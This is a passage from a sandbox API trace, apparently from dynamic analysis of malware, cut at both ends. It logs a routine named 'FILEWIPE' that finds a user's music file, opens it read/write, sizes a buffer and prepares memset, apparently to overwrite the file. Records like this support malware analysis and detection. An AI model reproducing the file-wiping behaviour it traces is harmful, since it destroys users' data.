hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.314] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.314] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.315] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.315] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.315] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.315] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.315] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0181.315] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.315] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0181.315] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.315] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0181.315] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.315] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0181.315] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.315] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0181.315] FreeLibrary (hLibModule=0x74f20000) returned 1 [0181.315] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.315] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.317] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.320] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.320] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0181.320] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.321] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.321] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ba16f30, ftCreationTime.dwHighDateTime=0x1d5e592, ftLastAccessTime.dwLowDateTime=0xefe21660, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0xefe21660, ftLastWriteTime.dwHighDateTime=0x1d5d85c, nFileSizeHigh=0x0, nFileSizeLow=0xef06, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cEm-bR.m4a", cAlternateFileName="")) returned 0x90ae18 [0181.321] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0181.321] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.321] CharLowerBuffW (in: lpsz="byte[61190]", cchLength=0xb | out: lpsz="byte[61190]") returned 0xb [0181.323] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.323] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0181.323] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.323] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0181.323] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0181.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0181.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0181.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0181.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2688 [0181.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2688, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0181.324] FreeLibrary (hLibModule=0x75c90000) returned 1 [0181.324] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.324] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0181.324] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0181.324] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0181.324] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0181.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0181.325] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.325] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0181.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.325] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0181.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0181.361] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0181.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0181.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0181.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0181.361] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0181.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0181.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd528 [0181.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd528, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0181.362] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\cem-br.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0181.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0181.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0181.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0181.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0181.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd8f18 | out: hHeap=0x8a0000) returned 1 [0181.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0181.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0181.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0181.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0181.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0181.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0181.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0181.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0181.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.364] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0181.365] HeapFree (in: hHeap=0x8a0000, 